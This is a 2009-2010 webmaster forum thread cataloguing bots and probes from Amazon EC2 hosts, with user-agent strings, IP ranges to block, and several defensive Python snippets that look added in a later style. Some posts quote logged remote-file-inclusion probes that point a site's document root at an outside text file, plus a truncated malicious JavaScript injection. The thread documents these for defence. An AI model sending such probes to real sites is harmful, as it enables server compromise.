
Forum Moderators: Ocean10000 & incrediBILL


amazonaws.com plays host to a wide variety of bad bots

Most recently seen: Gnomit

     

Pfui

3:04 am on Jan 18, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-67-202-57-30.compute-1.amazonaws.com
Mozilla/5.0 (compatible; X11; U; Linux i686 (x86_64); en-US; +http://gnomit.com/) Gecko/2008092416 Gnomit/1.0"

- robots.txt? NO
- Unbalanced quotation mark in UA (closing only)
- site in UA yields this oh-so-descriptive info:

<html>
<head>
</head>
<body>
</body>
</html>

----- ----- ----- ----- -----
FWIW, bona fide amazonaws.com hosts spewed at least 33 bots on two of my sites in recent months. (Does someone get paid per bot or something?) Some bots may be new to some of you, or newly renamed. Here are the actual UA strings, in no particular order:

NetSeer/Nutch-0.9 (NetSeer Crawler; [netseer.com;...] crawler@netseer.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
[Note ru.]
robots.txt? NO

feedfinder/1.371 Python-urllib/1.16 +http://www.aaronsw.com/2002/feedfinder/
robots.txt? NO

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008022910 Viewzi/0.1
robots.txt? NO

Twitturly / v0.5
robots.txt? NO

YebolBot (compatible; Mozilla/5.0; MSIE 7.0; Windows NT 6.0; rv:1.8.1.11; mailTo:thunder.chang@gmail.com)
robots.txt? NO

YebolBot (Email: yebolbot@gmail.com; If the web crawling affects your web service, or you don't like to be crawled by us, please email us. We'll stop crawling immediately.)
[Whattaya think robots.txt is for, huh?]
robots.txt? YES ... Four times in 45 minutes

Attributor/Dejan-1.0-dev (Test crawler; [attributor.com;...] info at attributor com)
robots.txt? NO

PRCrawler/Nutch-0.9 (data mining development project)
robots.txt? YES

EnaBot/1.2 (http://www.enaball.com/crawler.html)
robots.txt? YES

Nokia6680/1.0 ((4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html) )
[Note spaced-out closing parens]
robots.txt? YES

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461) Java/1.5.0_09
robots.txt? NO

TheRarestParser/0.2a (http://therarestwords.com/)
robots.txt? NO

Mozilla/5.0 (compatible; D1GArabicEngine/1.0; crawlmaster@d1g.com)
robots.txt? NO

Clustera Crawler/Nutch-1.0-dev (Clustera Crawler; [crawler.clustera.com;...] cluster@clustera.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
robots.txt? YES

yacybot (i386 Linux 2.6.16-xenU; java 1.6.0_02; America/en) [yacy.net...]
robots.txt? NO

Mozilla/5.0
robots.txt? NO

Spock Crawler (http://www.spock.com/crawler)
robots.txt? YES

TinEye
robots.txt? NO

Teemer (NetSeer, Inc. is a Los Angeles based Internet startup company.; [netseer.com...] crawler@netseer.com)
robots.txt? YES

nnn/ttt (n)
robots.txt? YES

AideRSS/1.0 (aiderss.com)
robots.txt? NO

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
robots.txt? NO

----- ----- ----- ----- -----
These two UAs alternated multiple times one afternoon:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
robots.txt? NO

WebClient
robots.txt? YES

----- ----- ----- ----- -----
And finally, way too many offerings from "Paul," who's apparently unable to make up his mind, UA name-wise:

Mozilla/5.0 (compatible; page-store) [email:paul at page-store.com
robots.txt? NO

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com)
robots.txt? YES

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

-----
Slippery little suckers indeed. Thank goodness I block amazonaws.com no matter what.

Pfui

7:31 pm on Nov 17, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Many, many AWS-based UAs still hitting home and specific pages. robots.txt? NEVER.

DAILY (multiple times; always HEAD requests):

ec2-75-101-197-164.compute-1.amazonaws.com
PycURL/7.18.2

ec2-174-129-141-109.compute-1.amazonaws.com
PostRank/2.0 (postrank.com)

WEEKLY (approx.; always HEAD requests):

ec2-174-129-91-231.compute-1.amazonaws.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

(Two days earlier, Netcraft sent its minion...)

lager.netcraft.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

dstiles

10:20 pm on Nov 17, 2009 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



I just dumped the whole 174.129.nnn.nnn block into IIS's Security Deny list - won't ever see it again even in the logs. A /24 of a persistent 75.101 block followed it in and is likely to be extended any day now...

Pfui

11:38 pm on Nov 17, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



One more for your files, dstiles:)

I forgot to mention this pest, which hits many, many, many times a day. No robots.txt, natch. GETs, not HEADs:

ec2-67-202-15-174.compute-1.amazonaws.com
Python-urllib/2.6

dstiles

12:06 am on Nov 18, 2009 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



Only got one hit near that this month (176, not 174) but lots more in the 67.202.nnn.nnn range. Their days may be numbered but I'm interested in seeing what else comes along. :)

I already have all known (to me) AWS blocks blocked with hits logged, including 67.202.0.0 - 67.202.127.255. It's when the hits cloud other logged issues that I react violently. :)

Bewenched

6:40 pm on Nov 19, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Yup... had to just block ALL of 174.129.x.x

MASSIVE amounts of form submits, like 600 in less than one minute.
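
A burst like that can be spotted with a sliding-window counter. The following is only a sketch: the class name, the per-key grouping (an IP or a /16 prefix, say), and the defaults of 600 hits per 60 seconds are illustrative assumptions, not anything taken from a real server config.

```python
from collections import defaultdict, deque


class SubmitRateMonitor:
    """Hypothetical helper: flags a key once it reaches `limit` hits
    within the last `window` seconds."""

    def __init__(self, limit=600, window=60.0):
        self.limit = limit
        self.window = window
        self._hits = defaultdict(deque)  # key -> timestamps of recent hits

    def record(self, key, now):
        """Record one hit at time `now` (seconds); return True if over the limit."""
        recent = self._hits[key]
        recent.append(now)
        # Drop timestamps that have fallen out of the window.
        while recent and now - recent[0] >= self.window:
            recent.popleft()
        return len(recent) >= self.limit


if __name__ == "__main__":
    monitor = SubmitRateMonitor(limit=3, window=60.0)
    for t in (0.0, 1.0, 2.0):
        print(t, monitor.record("174.129", t))
```

Keying on the first two octets rather than the full IP would catch a blitz spread across many EC2 instances, at the cost of lumping unrelated hosts together.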

Pfui

8:01 pm on Nov 19, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Amazon's Elastic Compute Cloud (EC2)/AWS hosting gets bigger and biggger and bigggger:

174.129.0.0 - 174.129.255.255
174.129.0.0/16
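
For anyone converting start-end ranges like the one above into CIDR notation for a deny list, here is a minimal sketch using Python's standard ipaddress module. The RANGES list holds two ranges quoted in this thread and is illustrative only; the function names are made up for the example.

```python
import ipaddress

# Start/end pairs quoted in this thread; extend as new blocks turn up.
RANGES = [
    ("174.129.0.0", "174.129.255.255"),
    ("67.202.0.0", "67.202.127.255"),
]


def range_to_cidrs(start, end):
    """Return the CIDR blocks that exactly cover start..end (inclusive)."""
    first = ipaddress.IPv4Address(start)
    last = ipaddress.IPv4Address(end)
    return [str(net) for net in ipaddress.summarize_address_range(first, last)]


def is_blocked(ip, ranges=RANGES):
    """True if ip falls inside any of the listed ranges."""
    addr = ipaddress.IPv4Address(ip)
    return any(
        ipaddress.IPv4Address(lo) <= addr <= ipaddress.IPv4Address(hi)
        for lo, hi in ranges
    )


if __name__ == "__main__":
    for start, end in RANGES:
        print(start, "-", end, "=>", range_to_cidrs(start, end))
```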

@Bewenched: Yikes. Were you attacked by a single IP/amazonaws.com Host? If yes, which one, please? Also, was there one particular UA? TIA

Pfui

10:51 pm on Nov 19, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-174-129-75-209.compute-1.amazonaws.com
SheenBot/SheenBot-1.0.0 (Sheen web crawler)

robots.txt? Yes

Pfui

11:00 pm on Nov 19, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Two UAs crawling Tweeted URLs:

ec2-174-129-62-166.compute-1.amazonaws.com
Typhoeus - http://github.com/pauldix/typhoeus/tree/master

robots.txt? NO

ec2-75-101-227-191.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.1

robots.txt? NO

keyplyr

9:11 am on Nov 21, 2009 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



ec2-174-129-225-12.compute-1.amazonaws.com
UA: Who.is Bot
robots.txt: no

hit / and ran

tangor

9:46 am on Nov 21, 2009 (gmt 0)

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month



I'm so close to Deny 174.129* that I have to ask (and I ask because this topic thrills me, but I have little to zero ambition to learn it fully): are there ANY legit visitors from this domain? So far I've seen none. I lean toward whitelisting (less work) rather than expending oodles of time on pissant denies, because the latter is SO much more work!

Pfui

10:09 pm on Nov 21, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



I block by Host (amazonaws) and I've yet to see a single real-person-in-real-time hit from AWS since before I began this thread on Jan. 17, 2009. Rapid-fire assaults increase every week, like this 90-second blitz from a few days ago (partial listing):

[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:38 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:52:41 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:53:17 2009] [client 174.129.175.212] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:54:09 2009] [client 174.129.175.212] client denied by server configuration: (file path)

That range, that place, gives irresponsible bot-runners a place to hide and breed.
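
To see which IPs account for the denials in an excerpt like the one above, the lines can be tallied per client. This is a rough sketch that assumes the log lines look exactly as quoted in this post (the timestamps and file path are abbreviated there); the regex and function name are illustrative and would need adjusting for a full Apache error log.

```python
import re
from collections import Counter

# Matches the "[client a.b.c.d] client denied ..." part of each quoted line.
DENIED_RE = re.compile(
    r"\[client (\d{1,3}(?:\.\d{1,3}){3})\] client denied by server configuration"
)


def count_denied(lines):
    """Count 'client denied' entries per client IP."""
    counts = Counter()
    for line in lines:
        m = DENIED_RE.search(line)
        if m:
            counts[m.group(1)] += 1
    return counts


# First four lines of the listing above.
SAMPLE = [
    "[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)",
    "[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)",
    "[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)",
    "[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)",
]

if __name__ == "__main__":
    for ip, hits in count_denied(SAMPLE).most_common():
        print(ip, hits)
```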

keyplyr

11:21 pm on Nov 21, 2009 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



What range does Amazon's A9 search engine crawl from?

Pfui

8:39 am on Nov 22, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Good Q. Beats me. Never spotted an A9 hit -- anyone? Then again, it appears A9 is primarily product-oriented now and none of my sites sell stuff. Rather, the majority of my hits from AWS are social network-related.

Pfui

5:23 pm on Nov 22, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Alas, even Amazon EC2 (Amazon Elastic Compute Cloud) isn't free of exploit-probers:

ec2-67-202-25-2.compute-1.amazonaws.com
Toata dragostea mea pentru diavola

11/22 07:59:29 /1.1
11/22 07:59:29 /install.txt
11/22 07:59:29 /
11/22 07:59:30 /cart/
11/22 07:59:30 /zencart/
11/22 07:59:30 /zen-cart/
11/22 07:59:30 /zen/
11/22 07:59:30 /shop/

Here's info [webmasterworld.com] about the primary 'toata' UA. (There are variations.) As a Romanian-speaking pal of GaryK's translated here [webmasterworld.com], it means: "I love the devil."

Pfui

4:57 am on Nov 24, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Yikes. Another exploit this evening:

ec2-67-202-60-246.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.0

//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

At least AWS has recommendations/info [aws.amazon.com] for reporting abuse. Wonder if bad bots qualify as report-worthy, too?;)

---
P.S./FYI

The following hosts/UAs just requested the exact same 'file' -- the URIs match even down to the exact same clientid and site referenced -- within the same 20-minute period. Googlebot, which was the only one to request robots.txt, was also the only one to attempt the hit twice (1 min. apart):

icerocket.com
BlogSearch/1.0 +http://www.icerocket.com/

87.218.210-nn.q9.net
Java/1.6.0_14

crawl-66-249-71-107.googlebot.com
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

64.94.67.nnn
Moreoverbot/5.00 (+http://www.moreover.com; webmaster@moreover.com)

Who's crawling/exploiting whom?

keyplyr

8:59 am on Nov 24, 2009 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

There's a lot of that coming from various hosts.

Pfui

10:01 am on Dec 1, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-67-202-41-144.compute-1.amazonaws.com
cierzo/Nutch-0.9

robots.txt? Yes

Pfui

10:33 pm on Dec 3, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-75-101-232-27.compute-1.amazonaws.com
MetaURI API +metauri.com

robots.txt? NO

Pfui

1:09 am on Dec 4, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-75-101-158-138.compute-1.amazonaws.com
my6sense/1.0

robots.txt? NO

Pfui

2:49 am on Dec 7, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Emphasis mine. Running from amazonaws, this is a bot. But it's also a FF add-on, which means, if it alters all FF strings, it'll be iffy distinguishing potential hits from less obvious/notorious server farms.

ec2-75-101-196-241.compute-1.amazonaws.com
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (MrTweet/1.0)

robots.txt? NO

dstiles

8:10 pm on Dec 9, 2009 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



Just to add another reason to block the cloud:

"Zeus crimeware using Amazon's EC2 as command and control server"
(from zdnet security blog)

A few days ago I noted in another thread that I'd seen an AWS IP in the midst of botnet accesses.

keyplyr

2:00 am on Dec 21, 2009 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



...an AWS IP in the midst of botnet accesses.

In the "midst?" Ha, I looked up "botnet" and expected to see a thumbnail of Amazon EC2:

174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"
75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"
67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.2.96 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 936 "-" "-"
75.101.213.151 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
174.129.107.93 - - [19/Dec/2009:08:13:41 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
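
A pattern like the one above (many different IPs requesting the same file within seconds) can be pulled out of an access log mechanically. The sketch below assumes combined-log-format lines as quoted in this post; the function names and the 60-second window are illustrative choices, and SAMPLE is four of the lines above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Fields used here: client IP, timestamp, and the requested path.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*"')


def parse(line):
    """Return (ip, datetime, path), or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, stamp, path = m.groups()
    return ip, datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z"), path


def max_distinct_ips(lines, window=timedelta(seconds=60)):
    """For each path, the largest number of distinct IPs seen in any one window."""
    by_path = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            ip, when, path = rec
            by_path[path].append((when, ip))
    result = {}
    for path, hits in by_path.items():
        hits.sort()
        best = 0
        # Slide the window start over every hit and count distinct IPs inside it.
        for i, (start, _) in enumerate(hits):
            ips = {ip for when, ip in hits[i:] if when - start <= window}
            best = max(best, len(ips))
        result[path] = best
    return result


SAMPLE = [
    '174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"',
    '75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"',
    '67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"',
    '67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"',
]

if __name__ == "__main__":
    print(max_distinct_ips(SAMPLE))
```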

Pfui

5:36 pm on Dec 22, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-174-129-64-134.compute-1.amazonaws.com
Mozilla/5.0 (compatible; XmarksFetch/1.0; +http://www.xmarks.com/about/crawler; info@xmarks.com)

robots.txt? Yes

Pfui

6:14 pm on Dec 22, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Speaking of AWS/EC2 and botnet-related exploits... Three seconds apart:

.
Mozilla/5.0
22:36:04 ///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

ec2-204-236-129-29.us-west-1.compute.amazonaws.com
Mozilla/5.0
22:36:07 ///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

Notes:

- The first hit's dot-as-host IP turned out to be 99.198.118.18*, a Chicago-based server farm. Search results show the same IP and exploit hitting elsewhere.

- The intra-URI exploit domain obfuscated in both hits as 'example.com' has approx. 2,150 search results. Its page title? "Verified by Visa" (and content includes "Start by entering your Visa card below...").

- If you're blocking on amazonaws.com subdomain formats, the second hit is slightly different. Typically, they're --

IP.compute-1(or2,etc).amazonaws.com

-- but this is:

IP.us-west-1.compute.amazonaws.com

There are more variations here [robtex.com]. (I block on amazonaws.com)
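
For those who match on hostname, the two formats noted above can be handled with one pattern. This is a sketch only: the regex covers just the two EC2 hostname shapes seen in this thread, the function names are made up for illustration, and the hostname is assumed to come from a reverse-DNS lookup done elsewhere.

```python
import re

# Covers "ec2-a-b-c-d.compute-N.amazonaws.com" and
# "ec2-a-b-c-d.<region>.compute.amazonaws.com" as seen in this thread.
EC2_HOST_RE = re.compile(
    r"^ec2-(\d{1,3})-(\d{1,3})-(\d{1,3})-(\d{1,3})\."
    r"(?:compute-\d+|[a-z0-9-]+\.compute)\.amazonaws\.com$"
)


def ec2_ip_from_host(host):
    """Return the dotted IP embedded in an EC2 hostname, or None."""
    m = EC2_HOST_RE.match(host.lower().rstrip("."))
    return ".".join(m.groups()) if m else None


def is_amazonaws(host):
    """Broad check: any host at or under amazonaws.com, whatever the subdomain."""
    host = host.lower().rstrip(".")
    return host == "amazonaws.com" or host.endswith(".amazonaws.com")


if __name__ == "__main__":
    for name in (
        "ec2-67-202-57-30.compute-1.amazonaws.com",
        "ec2-204-236-129-29.us-west-1.compute.amazonaws.com",
        "lager.netcraft.com",
    ):
        print(name, ec2_ip_from_host(name), is_amazonaws(name))
```

Matching on the bare amazonaws.com suffix, as in is_amazonaws, stays correct if further subdomain formats appear; the stricter regex is only useful when the embedded IP is wanted.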

Pfui

8:24 pm on Dec 22, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Whoa. Another one. Wonder when AWS/EC2 is going to clean up its act?

ec2-75-101-138-216.compute-1.amazonaws.com
Mozilla/5.0
10:47:33 //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?

Note: .su is the country-code TLD originally assigned to the Soviet Union.

(FWIW, I won't keep posting exploit events because this thread's for spider-sightings and the fake UA has been reported.)

dstiles

3:46 pm on Jan 1, 2010 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



Just found a new (to me) Amazon IP block. Cloud but not labelled AWS.

IP: 204.236.128.0 - 204.236.255.255
UA: Chen Li/Nutch-1.0 (Nutch spiderman; [chenli....] com. cn; chenlibiti @163. com)
Robots: No idea.

Amazon.com, Inc.
OrgID: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2

Pfui

4:59 pm on Jan 1, 2010 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Good spotting, dstiles! Shoot. Cloaked servers now, too -- and w/ a UA related to China via .cn and 163.com, hosts with long histories of nastiness on my sites. In a word: Ugh.

FWIW, here's yet another UA:

ec2-174-129-141-135.compute-1.amazonaws.com
Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

robots.txt? NO

dstiles

11:12 pm on Jan 1, 2010 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



Already got the whole range 174.129.0.0 - 174.129.255.255 blocked! :)

Pfui

10:05 am on Jan 12, 2010 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



No UA at all this time, and only went for favicon.ico:

ec2-75-101-169-108.compute-1.amazonaws.com
-

robots.txt? NO

tangor

10:50 am on Jan 12, 2010 (gmt 0)

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month



Pfui...

This has been a very interesting thread... what say you parse it for significance and reduce it to the full skinny? For the kiddies out there yet to ask the query?

More fun: provide IP ranges a la amazonaws.com
